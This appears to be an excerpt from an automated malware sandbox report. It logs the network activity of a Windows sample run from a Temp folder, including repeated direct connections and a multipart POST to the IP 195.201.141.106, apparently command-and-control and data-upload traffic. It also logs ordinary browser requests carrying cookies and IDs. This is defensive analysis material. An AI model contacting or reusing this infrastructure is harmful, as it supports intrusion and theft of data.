          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknownTCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024D889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_0024D889
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 195.201.141.106Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /b?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1
          Source: global trafficHTTP traffic detected: GET /b2?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1EA27ce3b1ee0d790c63e791736698994; XID=1EA27ce3b1ee0d790c63e791736698994
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9C9B0C5E00C44C8A8B186E4587E0FF4B&MUID=0DA5835E35016A581E46962C34736B24 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; SM=T; _C_ETH=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
          Source: 000003.log7.20.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
          Source: 000003.log7.20.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
          Source: 000003.log7.20.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000F.00000003.2555015799.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2554814875.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2554414550.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
          Source: chrome.exe, 0000000F.00000003.2555015799.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2554814875.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2554414550.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
          Source: global trafficDNS traffic detected: DNS query: LBkgcUFdJvUBmfKVwVgI.LBkgcUFdJvUBmfKVwVgI
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: apis.google.com
          Source: global trafficDNS traffic detected: DNS query: play.google.com
          Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
          Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
          Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
          Source: global trafficDNS traffic detected: DNS query: assets.msn.com
          Source: global trafficDNS traffic detected: DNS query: c.msn.com
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLNHost: 195.201.141.106Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
